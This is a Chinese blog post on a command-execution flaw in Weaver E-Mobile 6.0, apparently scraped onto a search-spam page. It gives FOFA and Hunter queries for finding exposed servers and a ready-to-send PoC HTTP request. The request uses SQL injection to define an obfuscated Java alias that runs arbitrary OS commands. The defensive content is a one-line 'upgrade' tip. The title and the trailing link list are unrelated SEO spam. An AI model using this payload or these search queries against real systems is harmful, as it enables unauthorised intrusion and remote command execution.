当前位置: 首页 > news >正文

wordpress添加头像搜索引擎优化师工资

wordpress添加头像,搜索引擎优化师工资,wordpress 创建子主题,义乌外贸论坛声明 本文仅用于技术交流,请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 一、漏洞原理 泛微E-Mobile 6.0存在命令执行漏洞的问题,在…

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

一、漏洞原理

泛微E-Mobile 6.0存在命令执行漏洞的问题,在某些情况下,用户的输入可能被直接传递给底层操作系统的命令执行函数,攻击者可以通过在输入中插入特殊字符或命令序列来欺骗应用程序将其作为有效命令来执行,从而获得服务器的命令执行权限。

二、网络空间测绘

fofa

"Weaver E-Mobile"

Hunter

web.body=Weaver E-Mobile

三、poc

POST /client.do HTTP/1.1
Host: xxx.xxx.xxx.xxx
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTm8YXcJeyKDClbU7
Content-Length: 1147------WebKitFormBoundaryTm8YXcJeyKDClbU7
Content-Disposition: form-data; name="method"getupload
------WebKitFormBoundaryTm8YXcJeyKDClbU7
Content-Disposition: form-data; name="uploadID"1';CREATE ALIAS if not exists MzSNqKsZTagmf AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL MzSNqKsZTagmf('whoami');--
------WebKitFormBoundaryTm8YXcJeyKDClbU7--

四、漏洞复现

先见一下面,访问漏洞环境

burp抓包,放poc,拿下

五、修复建议

 升级版本,低版本漏洞太多了

泛微e-office体验服务中心_泛微移动办公OA系统标准版_中小组织办公数字化产品

http://www.ds6.com.cn/news/95501.html

相关文章:

  • 做网站时为什么导航时两行字google浏览器官方下载
  • 手机网站案例 鸿店铺推广软文300字
  • 门户网站搭建方案营销网站建设都是专业技术人员
  • 电商企业网站建设方案如何被百度收录
  • 官方关停13家网站广州网站优化公司排名
  • 做韩国的跨境电商网站微商怎样让客源主动加你
  • 网站把域名解析到新ip后谈谈你对网络营销的看法
  • 只做动漫的网站邯郸seo排名
  • 网站建设极地网今天的新闻头条最新消息
  • 深圳企业网站建设公司排名h5制作
  • 个体户营业执照查询网上查询郑州seo优化服务
  • 品牌网站源码百度关键词数据
  • 怎么做百度网站免费的北京网站优化步
  • 团购网站建设免费数据查询网站
  • 个人资料网站怎么做建网络平台要多少费用
  • 做住宿网站挣钱吗今日最新新闻重大事件
  • 网站内容该怎么做大数据分析网站
  • 外贸网站怎么做优化网络营销的主要内容包括
  • 博客的网站页面设计网络营销实训个人总结
  • 在深圳市做一个网站多少钱搜索引擎推广与优化
  • 做网站专用图标站长工具seo综合查询关键词
  • 做杀人任务的网站如何自己制作一个网站
  • 百度有没有做游戏下载网站吗太原关键词优化报价
  • 不做百度推广网站关键词被屏蔽整站优化加盟
  • 网站建设要咨询哪些淘宝关键词搜索排名
  • 怎么制作属于自己的网站web网页制作成品免费
  • 西安做网站公司有哪些seo自动优化工具
  • 网页快照网站刷链接浏览量网站
  • 江苏高端品牌网站建设如何宣传推广产品
  • 给女朋友做的网站内容怎么制作一个网页